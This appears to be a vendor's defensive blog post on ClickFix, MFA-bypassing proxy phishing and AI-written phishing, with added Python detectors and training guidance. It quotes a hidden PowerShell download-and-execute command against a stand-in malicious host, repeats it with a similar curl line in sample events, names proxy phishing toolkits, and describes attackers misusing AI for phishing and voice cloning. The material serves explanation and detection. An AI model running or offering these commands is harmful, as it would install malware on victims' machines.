Phishing in 2026: ClickFix, Adversary-in-the-Middle, and AI-Powered Social Engineering

Phishing has evolved beyond Nigerian prince emails. Modern attacks use ClickFix techniques to trick users into running malicious commands, adversary-in-the-middle proxies to bypass MFA, and AI-generated content indistinguishable from legitimate communications. Here's how to update your defenses.


Key Takeaways

  • ClickFix attacks trick users into copying and pasting malicious PowerShell commands under the guise of "fixing" a technical problem
  • Adversary-in-the-Middle (AitM) phishing proxies intercept authentication in real-time, bypassing MFA entirely
  • AI-generated phishing eliminates traditional red flags like grammatical errors, enabling hyper-personalized attacks at scale
  • Security awareness training must evolve to focus on behavioral indicators rather than quality tells
  • SOC 2 security awareness requirements demand documented training programs that address current threats

The Nigerian prince has retired. Today's phishing attacks are operated by sophisticated threat actors using automation, AI, and psychological manipulation techniques that would make a social engineer from 2015 weep with envy.

In 2026, phishing is no longer about spotting typos or suspicious sender addresses. Attackers have adopted techniques that exploit trust in legitimate platforms, bypass multi-factor authentication, and generate content so convincing that even security-trained employees fall victim.

This guide covers three attack patterns that security teams need to understand and defend against right now.

1. ClickFix: When Users Become the Attack Vector

ClickFix is a social engineering technique that weaponizes technical troubleshooting. Instead of delivering malware through email attachments or malicious links, attackers trick users into executing PowerShell commands on their own machines.

How ClickFix Works

The attack typically unfolds across four stages:

Stage 1: Initial Lure

The victim encounters what appears to be a technical problem. This could be:

  • A fake error message on a compromised or spoofed website ("Your browser needs to be updated")
  • A CAPTCHA-like verification prompt ("Verify you're human by completing these steps")
  • A document that won't render ("To view this document, follow the instructions below")
  • A fake technical support page impersonating Google, Microsoft, or another trusted vendor

Stage 2: The "Fix"

The page presents step-by-step instructions to resolve the issue. The user is told to:

  1. Press Win + R to open the Run dialog (or open Terminal on macOS)
  2. Paste a command that was automatically copied to their clipboard
  3. Press Enter

What appears on screen might look like a simple browser fix or verification code. The actual command hidden in the clipboard is obfuscated PowerShell that downloads and executes malware.

Stage 3: Execution

When the user pastes and runs the command, they're executing something like:

    powershell -w hidden -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://malicious-domain.com/payload.ps1')"

This command:

  • Runs PowerShell in a hidden window (-w hidden)
  • Bypasses execution policy restrictions (-ep bypass)
  • Downloads and immediately executes a remote script (IEX)

Stage 4: Payload Delivery

The downloaded script typically installs infostealers like Lumma Stealer or Atomic Stealer (on macOS). These harvest:

  • Browser cookies and saved passwords
  • Cryptocurrency wallet files
  • SSH keys and cloud credentials
  • MFA backup codes stored in notes or documents

Why ClickFix Bypasses Security Controls

Traditional email security, endpoint protection, and web filters often miss ClickFix attacks because:

  • No malicious attachment: The initial email or page contains only text instructions
  • User-initiated execution: The victim manually runs the command, bypassing behavioral analysis
  • Trusted platforms: Attackers host lures on legitimate services (Google Sites, GitHub, Notion)
  • Clipboard manipulation: The malicious command is copied via JavaScript, invisible to the user
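User-initiated execution does not make the process lineage invisible: anything launched from the Run dialog is a child of explorer.exe, and the command line carries the traits shown above. The following Python detector is an added example, not code from the article or any product it names; it runs over constructed Sysmon-style process-creation events (the second event reuses the article's own command line, the others are constructed for contrast) and flags a shell under an interactive parent whose command line shows at least two indicators.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry). The command line of the
# second event is the article's own ClickFix example; the rest are constructed for contrast.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\userinit.exe", "cmdline": "explorer.exe"},
    {"pid": 5300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -w hidden -ep bypass -c \"IEX(New-Object Net.WebClient)"
                ".DownloadString('https://malicious-domain.com/payload.ps1')\""},
    {"pid": 5410, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Vendor\agent.exe",
     "cmdline": r"powershell -ExecutionPolicy AllSigned -File C:\ProgramData\Vendor\inventory.ps1"},
    {"pid": 5520, "image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"cmd /c curl https://malicious-domain.com/x.bat -o %TEMP%\x.bat && %TEMP%\x.bat"},
]

# Each indicator is one trait of the command above. One alone is common in admin scripts;
# two or more under an interactive parent is the ClickFix shape.
INDICATORS = {
    "hidden_window":   r"-w(?:indowstyle)?\s+hidden",
    "policy_bypass":   r"-e(?:xecutionpolicy|p)\s+bypass",
    "encoded_command": r"-e(?:nc|ncodedcommand)\b",
    "download_cradle": r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b",
    "inline_exec":     r"\biex\b|invoke-expression",
    "remote_url":      r"https?://",
}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
INTERACTIVE_PARENTS = {"explorer.exe"}   # the Win+R Run dialog launches its child under explorer.exe

def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def indicators(cmdline):
    """Names of the indicators present in a command line, in INDICATORS order."""
    return [name for name, rx in INDICATORS.items() if re.search(rx, cmdline, re.IGNORECASE)]

def detect_clickfix(events, min_hits=2):
    """Flag shells spawned by an interactive parent whose command line has >= min_hits indicators."""
    alerts = []
    for ev in events:
        if basename(ev["image"]) not in SHELLS or basename(ev["parent"]) not in INTERACTIVE_PARENTS:
            continue
        hits = indicators(ev["cmdline"])
        if len(hits) >= min_hits:
            alerts.append({"pid": ev["pid"], "cmdline": ev["cmdline"], "indicators": hits})
    return alerts
```

The inventory script under a vendor agent is not flagged: wrong parent and no indicators, which is the false-positive case a rule like this must handle before it ships.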

Real-World ClickFix Campaigns

Security researchers have documented ClickFix campaigns impersonating:

  • Google Chrome error pages requesting users to "fix" display issues
  • Microsoft Teams meeting pages with verification requirements
  • Cloudflare CAPTCHA pages on compromised websites
  • GitHub authentication prompts for accessing private repositories

The technique has been attributed to both financially motivated cybercriminals and nation-state actors, with campaigns targeting cryptocurrency users, developers, and enterprise employees.

2. Adversary-in-the-Middle: Bypassing MFA in Real-Time

Multi-factor authentication was supposed to solve phishing. If attackers steal your password, they still can't log in without the second factor. That assumption no longer holds.

Adversary-in-the-Middle (AitM) phishing, also called real-time phishing proxies, defeats MFA by intercepting the entire authentication session as it happens.

How AitM Attacks Work

Step 1: Phishing Page Setup

Attackers deploy a reverse proxy server that sits between the victim and the legitimate authentication service (Microsoft 365, Okta, Google Workspace). The phishing page looks identical to the real login page because it is the real login page, just proxied through the attacker's infrastructure.

Step 2: Credential Capture

When the victim enters their username and password, the proxy:

  1. Captures the credentials in plaintext
  2. Forwards them to the legitimate authentication service
  3. Relays the MFA prompt back to the victim

Step 3: MFA Bypass

The victim completes their normal MFA flow, entering a TOTP code, approving a push notification, or tapping a hardware token whose one-time code is not tied to the site. The proxy relays this step too and completes the authentication on behalf of the attacker. (Origin-bound FIDO2 keys and passkeys are the exception; see the phishing-resistant MFA recommendation below.)

Step 4: Session Hijacking

Once authentication succeeds, the attacker captures the session cookies. With these cookies, they can access the victim's account without needing credentials or MFA. The session remains valid until it expires or is explicitly revoked.

AitM Toolkits in the Wild

Several open-source and commercial toolkits make AitM attacks accessible:

  • Evilginx2: The most well-known AitM framework, capable of capturing session tokens from most authentication providers
  • Modlishka: Another reverse proxy tool designed for phishing engagements
  • Muraena: Automated phishing infrastructure with session capture

These tools are trivial to deploy. An attacker can spin up a convincing Microsoft 365 phishing infrastructure in under an hour.

What AitM Looks Like to the Victim

From the victim's perspective, everything appears normal:

  • The login page looks legitimate (because it's proxying the real page)
  • The browser shows a valid TLS certificate (issued for the attacker's domain, not the real one)
  • MFA works as expected
  • After login, they're redirected to the real service

The only indicators something is wrong:

  • The URL domain is slightly different (often using typosquatting)
  • The login flow might have minor latency

Why Traditional Defenses Fail

AitM attacks bypass:

  • Password policies: The real password works perfectly
  • MFA: Every factor the victim can type or approve is captured and replayed in real time
  • Email security: The phishing link passes reputation checks if hosted on fresh or compromised domains
  • User training: The page is functionally identical to legitimate authentication
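What remains visible once those controls are bypassed is the identity provider's own log: the interactive sign-in arrives from the proxy's address rather than the victim's, and the stolen cookie is then used from wherever the attacker operates. The following Python correlation is an added example, not code from the article, over constructed sign-in events; it flags an MFA-satisfied sign-in from a hosting-provider ASN and a session reused from a different network within an hour of MFA. The IPs, ASNs and hosting list are constructed placeholders (documentation ranges).

```python
from datetime import datetime, timedelta

# Constructed identity-provider sign-in events (documentation IPs and ASNs, not real telemetry).
# In an AitM login the IdP never sees the victim's address: the interactive sign-in comes from
# the proxy, and the captured session cookie is later replayed from the attacker's own network.
SAMPLE_SIGNINS = [
    {"ts": "2026-03-02T09:00:05Z", "user": "a.lee", "session": "S1",
     "event": "interactive_mfa_success", "ip": "203.0.113.10", "asn": "AS64500"},
    {"ts": "2026-03-02T09:20:00Z", "user": "a.lee", "session": "S1",
     "event": "token_refresh", "ip": "203.0.113.10", "asn": "AS64500"},
    {"ts": "2026-03-02T10:15:42Z", "user": "b.ortiz", "session": "S2",
     "event": "interactive_mfa_success", "ip": "198.51.100.77", "asn": "AS64496"},
    {"ts": "2026-03-02T10:19:03Z", "user": "b.ortiz", "session": "S2",
     "event": "token_refresh", "ip": "192.0.2.200", "asn": "AS64511"},
]

HOSTING_ASNS = {"AS64496"}   # constructed placeholder; in practice a maintained list of VPS/hosting ASNs

def parse_ts(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")

def session_anomalies(events, window=timedelta(hours=1), hosting_asns=HOSTING_ASNS):
    """Return (session, user, reason) tuples for sessions with AitM-style characteristics."""
    by_session = {}
    for ev in sorted(events, key=lambda e: e["ts"]):          # ISO timestamps sort as strings
        by_session.setdefault(ev["session"], []).append(ev)
    findings = []
    for sid, evs in by_session.items():
        login = next((e for e in evs if e["event"] == "interactive_mfa_success"), None)
        if login is None:
            continue                                           # no MFA sign-in in scope
        t0 = parse_ts(login["ts"])
        if login["asn"] in hosting_asns:
            findings.append((sid, login["user"],
                             f"MFA sign-in from hosting ASN {login['asn']} ({login['ip']})"))
        for ev in evs:
            if ev is login or ev["asn"] == login["asn"]:
                continue                                       # same network as the MFA sign-in
            minutes = (parse_ts(ev["ts"]) - t0).total_seconds() / 60
            if 0 <= minutes <= window.total_seconds() / 60:
                findings.append((sid, ev["user"], f"session reused from {ev['ip']} ({ev['asn']}) "
                                 f"{minutes:.0f} min after MFA at {login['ip']}"))
    return findings
```

A hit on either signal is a reason to revoke the session, which the article notes is the only thing that ends a hijacked session before it expires.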

3. AI-Powered Social Engineering: The End of Obvious Red Flags

For years, security awareness training taught employees to spot phishing through quality indicators: grammatical errors, awkward phrasing, generic greetings, and inconsistent branding. AI has eliminated these tells entirely.

What AI Enables for Attackers

Flawless Language at Scale

Large language models generate grammatically perfect, contextually appropriate text in any language. An attacker who doesn't speak French can now craft convincing phishing emails in French, complete with appropriate formality levels and cultural references.

Hyper-Personalization

AI can synthesize information from LinkedIn, company websites, press releases, and social media to create highly targeted messages. A phishing email might reference:

  • The target's recent promotion
  • A project their team announced
  • An upcoming conference they're attending
  • Specific colleagues or reporting relationships

Voice Cloning and Deepfakes

Beyond text, attackers use AI-generated audio for vishing (voice phishing) attacks. With a few minutes of sample audio from YouTube interviews or earnings calls, attackers can clone an executive's voice for fraudulent phone calls.

How AI Phishing Differs from Traditional Attacks

Traditional Phishing                 | AI-Powered Phishing
-------------------------------------|--------------------------------------
Generic greetings ("Dear Customer")  | Personalized with name, role, context
Grammatical errors                   | Flawless language in any language
Inconsistent branding                | Pixel-perfect impersonation
Mass-sent identical messages         | Unique content per target
Obvious urgency tactics              | Subtle psychological manipulation

Real-World Examples

Security researchers have documented AI being used to:

  • Generate unique phishing pages for each target organization based on scraped branding
  • Craft business email compromise (BEC) messages that match an executive's writing style
  • Create realistic fake invoices with accurate vendor details
  • Produce deepfake video messages for high-value fraud

Updating Your Security Awareness Program

Traditional training focused on identifying low-quality attacks. That model is obsolete. Here's how to adapt.

1. Train on Behavioral Indicators

Since quality-based detection no longer works, focus on behaviors that indicate phishing regardless of how polished the message appears:

  • Unexpected requests: Any request for credentials, financial actions, or sensitive data through unusual channels
  • Urgency and pressure: Artificial deadlines designed to bypass deliberate thinking
  • Verification bypass: Requests to skip normal approval processes "just this once"
  • Channel switching: Attempts to move communication off-platform or to personal devices

2. Implement Verification Procedures

Establish and reinforce out-of-band verification for sensitive actions:

  • Financial transfers require voice confirmation through a known number (not the one provided in the email)
  • Credential changes require approval through a separate authenticated channel
  • Executive requests go through assistants who verify legitimacy

3. Run Realistic Simulations

Your phishing simulations should reflect current attack sophistication:

  • Use AI-generated content in test campaigns
  • Test ClickFix scenarios where users are asked to run commands
  • Include AitM-style pages that proxy real login flows
  • Target specific individuals with personalized pretexts

4. Measure What Matters

Track metrics that reflect actual risk:

  • Time to report suspicious messages (faster is better)
  • Credential submission rate on simulated AitM pages
  • Command execution rate on ClickFix simulations
  • Verification procedure compliance for sensitive requests

What SOC 2 Auditors Expect

SOC 2's Common Criteria include explicit requirements for security awareness (CC2.2 and CC1.4). Here's what auditors look for:

Documented Training Program

You need evidence of:

  • Defined training curriculum covering current threats
  • Regular delivery schedule (typically annual minimum, quarterly recommended)
  • Completion tracking for all employees
  • Updated content reflecting emerging attack techniques

Phishing Simulation Results

Auditors expect to see:

  • Regular phishing tests (monthly or quarterly)
  • Metrics showing employee performance
  • Follow-up training for employees who fail simulations
  • Trend data demonstrating improvement over time

Incident Response Integration

Your training should connect to actual response procedures:

  • Clear reporting channels for suspected phishing
  • Documented response playbooks
  • Evidence that reported incidents are investigated

Continuous Improvement

Auditors look for evidence that your program adapts:

  • Updates to training content based on new threats
  • Adjustments based on simulation results
  • Incorporation of lessons from actual incidents

Practical Defense Recommendations

Technical Controls

  1. Deploy phishing-resistant MFA: FIDO2 security keys and passkeys are immune to AitM attacks because authentication is bound to the legitimate domain
  2. Implement browser isolation: For high-risk users, isolate web browsing to prevent credential theft
  3. Restrict PowerShell execution: For users who don't need it, block PowerShell with application control rather than relying on execution policy, which is not a security boundary (the -ep bypass switch in the ClickFix command above skips it)
  4. Monitor for ClickFix execution: Endpoint detection should flag shells launched from the Run dialog with hidden-window, execution-policy-bypass or download-and-execute arguments, alongside unusual clipboard writes from web pages
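Why control 1 holds against the AitM flow in section 2, as an added Python model that is not code from the article or from any toolkit it names: a TOTP code or push approval carries nothing that identifies the site, so the proxy can forward it unchanged, whereas a FIDO2 assertion is scoped by the browser to the page's own domain and has the origin signed into the client data. HMAC with a per-site secret stands in for the authenticator's ECDSA key, and login.example.com / login-example.com are placeholder domains.

```python
import hashlib, hmac, json, secrets
from urllib.parse import urlparse

class Authenticator:
    """Toy FIDO2 authenticator: HMAC with a per-rp_id secret stands in for the ECDSA key (a real one registers a public key)."""
    def __init__(self):
        self._creds = {}
    def register(self, rp_id):
        self._creds[rp_id] = secrets.token_bytes(32)
        return self._creds[rp_id]
    def get_assertion(self, rp_id, client_data_hash):
        key = self._creds.get(rp_id)
        if key is None:
            raise LookupError(f"no credential scoped to rp_id {rp_id!r}")
        auth_data = hashlib.sha256(rp_id.encode()).digest()   # rpIdHash, as in authenticatorData
        return auth_data, hmac.new(key, auth_data + client_data_hash, hashlib.sha256).digest()

def browser_get(auth, page_origin, challenge, rp_id=None):
    # A conforming browser derives rp_id from the page's own host and writes the origin itself;
    # the page cannot choose another domain. rp_id is overridable here only to model a rogue client.
    rp_id = rp_id or urlparse(page_origin).hostname
    client_data = json.dumps({"type": "webauthn.get", "challenge": challenge,
                              "origin": page_origin}, sort_keys=True).encode()
    auth_data, sig = auth.get_assertion(rp_id, hashlib.sha256(client_data).digest())
    return client_data, auth_data, sig

def rp_verify(rp_origin, key, challenge, client_data, auth_data, sig):
    cd = json.loads(client_data)
    if (cd.get("type") != "webauthn.get" or cd.get("challenge") != challenge
            or cd.get("origin") != rp_origin):       # origin check: the part a relaying proxy cannot pass
        return False
    if auth_data != hashlib.sha256(urlparse(rp_origin).hostname.encode()).digest():
        return False
    expected = hmac.new(key, auth_data + hashlib.sha256(client_data).digest(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, sig)

def aitm_against_fido2(rp_origin="https://login.example.com", phish_origin="https://login-example.com"):
    auth = Authenticator()
    key = auth.register(urlparse(rp_origin).hostname)
    challenge = secrets.token_hex(16)                 # the real RP's challenge, relayed unchanged by the proxy
    try:
        browser_get(auth, phish_origin, challenge)
        released = True
    except LookupError:
        released = False                              # nothing is scoped to the phishing domain
    # Even a non-conforming client that signed for the real rp_id fails: the origin is inside the signed data.
    cd, ad, sig = browser_get(auth, phish_origin, challenge, rp_id=urlparse(rp_origin).hostname)
    return {"browser_released_assertion": released,
            "rp_accepted_relayed_assertion": rp_verify(rp_origin, key, challenge, cd, ad, sig)}
```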

Process Controls

  1. Establish verification procedures: Document and enforce out-of-band confirmation for sensitive actions
  2. Create escalation paths: Make it easy for employees to verify suspicious requests without feeling they're slowing things down
  3. Regular tabletop exercises: Practice responding to sophisticated phishing scenarios

People Controls

  1. Update training content: Ensure your program covers ClickFix, AitM, and AI-generated attacks
  2. Reward reporting: Recognize employees who report phishing, even false positives
  3. Executive targeting awareness: Brief leadership on their elevated risk profile and specific threats

The Bottom Line

Phishing in 2026 requires defenders to abandon assumptions that worked for the past decade. Grammatical errors are no longer a tell. MFA is no longer a complete defense. Users can be tricked into becoming the attack vector themselves.

The organizations that maintain security posture will be those that:

  • Update training to focus on behavioral indicators instead of quality tells
  • Deploy phishing-resistant authentication that defeats AitM attacks
  • Implement verification procedures that don't rely on trusting message content
  • Test their defenses with simulations that reflect actual attack sophistication

The threat actors have leveled up. Your defenses need to do the same.


Frequently Asked Questions

What is ClickFix?

ClickFix is a social engineering technique where attackers trick users into copying and pasting malicious commands, typically PowerShell scripts, under the guise of fixing a technical problem or completing a verification step. The attack exploits user trust in troubleshooting processes.

How does AitM phishing bypass MFA?

AitM phishing uses a reverse proxy server that sits between the victim and the legitimate authentication service. When users enter credentials and complete MFA, the proxy captures everything in real-time, including session cookies, allowing attackers to hijack the authenticated session.

Why is AI-generated phishing harder to detect?

AI-generated phishing lacks the quality indicators (grammatical errors, generic content, inconsistent branding) that security tools traditionally flag. The content is well-written, personalized, and contextually appropriate, making it indistinguishable from legitimate communications.

What is phishing-resistant MFA?

Phishing-resistant MFA refers to authentication methods that cannot be intercepted by AitM attacks. FIDO2 security keys and passkeys bind authentication to the legitimate domain, so credentials cannot be replayed through a phishing proxy.

What do SOC 2 auditors expect from a security awareness program?

Auditors expect documented training curricula, regular phishing simulations with tracked metrics, completion records for all employees, evidence of program updates based on emerging threats, and integration with incident response procedures.


Bastion helps SaaS companies build security programs that address modern threats. Our managed compliance services for SOC 2 and ISO 27001 include security awareness training that covers current attack techniques, not yesterday's threats. Get started with Bastion →
